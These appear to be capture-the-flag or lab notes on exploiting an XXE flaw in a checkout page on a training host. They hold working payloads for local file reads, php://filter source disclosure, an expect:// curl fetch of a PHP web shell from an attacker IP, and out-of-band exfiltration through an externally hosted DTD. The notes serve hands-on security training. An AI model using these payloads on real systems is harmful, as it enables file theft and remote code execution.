## `shopdev2.inlanefeight.local` - visit page ![[images/Pasted image 20260630090210.png]] - we get in with `admin:admin` ![[images/Pasted image 20260630090247.png]] - `/checkout.php` submits an xml based POST request with an id number ![[images/Pasted image 20260630090643.png]] - whatever I place in the userid field shows up in the response ![[images/Pasted image 20260630090943.png]] - try to add xml code > confirmed XXE ![[images/Pasted image 20260630091125.png]] ```xml <!DOCTYPE email [ <!ENTITY company "Inlane Freight"> ]> ``` ## XXE - try to read a file - able to read `/etc/passwd` > we still see that only `root` has a login shell ![[images/Pasted image 20260630091305.png]] ```xml <!DOCTYPE email [ <!ENTITY company SYSTEM "file:///etc/passwd"> ]> ``` - let's pull `index.php` ![[images/Pasted image 20260630092032.png]] ```xml <!DOCTYPE email [ <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]> ``` ## RCE with XXE - first create `shell.php` then host via HTTP ![[images/Pasted image 20260630092622.png]] ```bash echo '<?php system($_REQUEST["cmd"]);?>' > shell.php ``` - now use `expect` to `curl shell.php` from Kali http server ![[images/Pasted image 20260630092903.png]] ```xml <!DOCTYPE email [ <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'10.10.15.114:8000/shell.php'"> ]> ``` - try to hit `shell.php` - not getting a hit on http server - try switching to `wget` - still nothing ## CDATA exfil - xml payload ```xml <!DOCTYPE email [ <!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag --> <!ENTITY % file SYSTEM "file:///etc/passwd"> <!-- reference external file --> <!ENTITY % end "]]>"> <!-- append the end of the CDATA tag --> <!ENTITY % xxe SYSTEM "http://10.10.15.114:8000/xxe.dtd"> <!-- reference our external DTD --> %xxe; ]> ``` - create `xxe.dtd` file on Kali and host via http - here we are able to hit the http server ```bash echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd python3 -m http.server 8000 ``` ![[images/Pasted image 20260630100112.png]] ## read flag - update xml payload as below substituting `email` for `userid` as that is the variable we are using for XXE ```xml <!DOCTYPE userid [ <!ENTITY company SYSTEM "file:///flag.txt"> ]> ``` - that's the ticket ![[images/Pasted image 20260630170456.png]]